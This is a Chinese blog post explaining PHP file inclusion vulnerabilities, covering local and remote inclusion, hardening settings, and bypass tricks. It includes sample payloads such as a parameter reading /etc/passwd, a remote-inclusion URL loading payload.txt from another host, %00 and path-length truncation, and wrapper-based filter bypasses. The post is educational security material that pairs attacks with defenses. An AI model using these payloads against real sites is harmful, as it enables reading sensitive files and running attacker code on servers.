[Web 安全]文件包含漏洞

最新推荐文章于 2023-12-17 20:11:44 发布
最新推荐文章于 2023-12-17 20:11:44 发布
阅读量157 收藏
点赞数
分类专栏: Web 安全 文章标签: 安全 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46181386/article/details/128578387
版权

漏洞原理

文件包含函数加载的参数没有经过过滤或严格的定义,可以被用户控制,包含了其他恶意文件,导致执行了非预期的代码。

PHP文件包含函数

  • include()

  • include_once()

  • require()

  • require_once()

文件包含漏洞分类

  • 本地文件包含

当包含的文件在服务器本地时,就形成了本地文件包含。

如:index.php?file=/etc/passwd

  • 远程文件包含

当包含的文件在远程服务器上时,就形成了远程文件包含。

如:index.php?file=http://192.168.70.7/payload.txt

利用条件:

  1. php.ini中allow_url_include = on

是否允许打开远程文件

  1. php.ini中allow_url_fopen = on

是否允许include、require远程文件

  1. 所包含远程服务器的文件后缀不能与目标服务器语言相同。(比如目标网站服务器是PHP脚本语言解析的,那么包含的远程服务器文件后缀不能是php)

漏洞危害

  1. 获取系统敏感信息

  1. 任意篡改网页信息

  1. 攻击其他服务器

防御方案

  1. 过滤. / \等特殊字符

  1. 日志、配置等重要文件夹不给执行权限

  1. 尽量不要将文件包含函数对应的文件放给前端选择和操作

  1. 使用open_basedir配置限制能够访问的区域

  1. 配置php.ini文件

allow_url_include = off
allow_url_fopen = off
magic_quotes_gpc = on

  1. 设置白名单,仅允许包含指定的文件

绕过手段

  1. URL编码

如果WAF中是字符串匹配,可以使用URL多次编码的方式绕过。

  1. 结尾添加特殊字符

某些情况下,读文件支持使用Shell通配符,如?* 空格等可能会影响include包含的结果。有时Unicode编码不同但字形相近的字符也有同样的效果。

  1. 路径长度截断

Windows:目录最大长度256字节,超出的部分将会丢弃

Linux:目录最大长度4096字节,超出的部分将会丢弃

如:index.php?file=payload.txt/./././././././././././././././././././(省略)

这种绕过方式要求php版本<5.2.8

  1. %00截断(绕过后端拼接后缀)

index.php?file=payload.txt%00

条件:PHP版本<5.3.4、PHP magic_quotes_gpc = off

如果开启了gpc或者使用了addslashes函数则会进行转义

  1. 点号截断

条件:Windows,点好需要长于256

如:index.php?file=payload.txt...............................................(省略)

  1. 协议绕过

allow_url_include、allow_url_fopen主要是针对HTTP、FTP两种协议起作用,因此可以使用SMB、WebDAV协议等方式绕过。

  1. 伪协议绕过

要求:allow_url_include = on、allow_url_fopen = on

Yu@99
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全-文件包含
sixoneyvye的博客
04-17 451
一、了解文件包含 了解文件包含 什么是文件包含:为了更好地使用代码的重用性,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码,简单点来说就是一个文件里面包含另外一个或多个文件。 漏洞成因:文件包含函数加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致了执行了非预期的代码。 PHP引发文件包含的四个函数 include() ...
文件包含漏洞文件包含Bypass漏洞基础
bluemoon_0的博客
03-17 394
文件包含漏洞文件包含Bypass漏洞基础
文件包含漏洞原理与实践
Galaxy_0的博客
02-25 536
文件包含漏洞原理与实践
文件包含漏洞
只有不断学习才不会被茫茫人海淹没!
05-06 4412
这里写目录标题理论漏洞产生原因利用方式防御绕过方式php伪协议实战 理论 漏洞产生原因 1、include出现错误时,不会影响php代码的执行,require会中断php代码的执行 2、include有返回值,require没有返回值; 3、include可以包含多次,include_once只包含一次,后者一样。 利用方式 防御 绕过方式 php伪协议实战 ......
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
web 网站文件包含漏洞和攻击-运维安全详细笔记总结 文件包含漏洞是指攻击者通过上传恶意文件,利用服务器的文件包含功能来执行恶意代码,从而获取服务器的控制权。文件包含漏洞可以分为本地文件包含漏洞和远程文件...
Web应用安全文件包含漏洞简介.pptx
06-18
文件包含漏洞Web应用安全领域中的一个重要话题,它主要源于开发者在编程时为了代码复用而采用的文件包含机制。这种机制允许程序动态地加载和执行存储在不同文件中的代码,但同时也为攻击者提供了可乘之机。下面将...
web安全技术-实验六、文件上传漏洞.doc
08-20
它包含各种常见的Web安全漏洞,如SQL注入、XSS攻击以及我们关注的文件上传漏洞,提供了一个实践和学习安全漏洞的平台。 3. **安全等级设置**:DVWA的安全等级分为多个级别,从"low"(低)到"impossible"(不可能)...
第七式 七伤拳 web安全文件包含漏洞专题.pdf
06-22
tsrc线上培训资料 第七式 七伤拳 web安全文件包含漏洞专题
web安全漏洞加固手册
06-22
本文档是关于 Web 安全漏洞加固手册的详细指南,旨在帮助开发者和安全专家了解和解决常见的 Web 安全漏洞。该手册涵盖了认证和授权类、命令执行类、文件上传类等多种类型的漏洞,提供了详细的检测和修复方案。 认证...
Web安全漏洞分析—文件包含
最新发布
qq_61861243的博客
12-17 2238
写入PHP文件 (allow_url include:on)http://127.0.0.1/include/03/index.php?访问: http://127.0.0.1/include/03/index.php?/usr/local/app/apache2/conf/httpd.conf //apache2配置文件。/usr/local/app/php5/lib/php.ini //php设置。
文件包含漏洞总结都在这里了
yuanxu8877的博客
10-20 3047
文件包含漏洞总结,全在这里了
PHP文件包含漏洞总结
dxm2025的专栏
11-13 682
0x00 前言 PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 我们来看下面一段index.php代码: if ($_GET['func']) { include $_GET['fu
CTF中文件包含漏洞总结
热门推荐
Lethe's Blog
02-13 4万+
CTF中文件包含漏洞总结 0x01 什么是文件包含漏洞 通过PHP函数引入文件时,传入的文件名没有经过合理的验证,从而操作了预想之外的文件,就可能导致意外的文件泄漏甚至恶意代码注入。 0x02 文件包含漏洞的环境要求 allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否...
网络安全文件包含漏洞总结
kali_Ma的博客
03-10 2260
介绍 文件包含漏洞属于代码注入漏洞,为了减少重复代码的编写,引入了文件包含函数,通过文件包含函数将文件包含进来,直接使用包含文件的代码;简单来说就是一个文件里面包含另外一个或多个文件。 但我们除了包含常规的代码文件外,包含的任意后缀文件都会被当作代码执行,因此,如果有允许用户控制包含文件路径的点,那么则很有可能包含非预期文件,从而执行非预期的代码导致getshell。 几乎所有的脚本语言中都会提供文件包含的功能,但文件包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至没有,
文件包含漏洞file_include
CMACCKK
03-09 1291
什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含 几个文件包含函数及特点 include函数 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时之给出一个警告,继续向下执行。 include_once函数 功能与include()相同,但程序只调用一次...
文件包含漏洞—allow_url_fopen和allow_url_include详解
weixin_44431280的博客
02-21 7736
文件包含漏洞_allow_url_fopen和allow_url_include详解 提要:在文件包含漏洞中,PHP脚本环境中php.ini文件中通常会涉及到这两个参数,两个参数的开启或关闭影响文件包含漏洞的利用。 1,参数简介: allow_url_fopen参数(只影响RFI,不影响LFI) 简介:是否允许将URL(HTTP,HTTPS等)作为文件打开处理 allow_url_include参数(只影响RFI,不影响LFI) 简介:是否允许includeI()和require()函数包含URL(HTTP
4.9. 文件包含
Sumarua的博客
07-04 1209
文章目录4.9. 文件包含4.9.1. 基础4.9.2. 触发Sink4.9.3. 绕过技巧4.9.3.1. url编码绕过4.9.3.2. 特殊字符绕过4.9.3.3. %00截断4.9.3.4. 长度截断4.9.3.5. 伪协议绕过4.9.3.6. 协议绕过4.9.4. 参考链接 4.9. 文件包含 4.9.1. 基础 常见的文件包含漏洞的形式为<?php include("inc/" . $_GET['file']); ?> 考虑常用的几种包含方式为 同目录包含file=.htacces
Web安全漏洞包括文件包含漏洞吗?
05-13
是的,文件包含漏洞Web安全漏洞的一种类型。文件包含漏洞通常发生在Web应用程序中,当应用程序使用用户提供的数据(如文件名或路径)来加载或执行文件时,攻击者可以通过构造恶意输入来实现远程代码执行或敏感信息...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值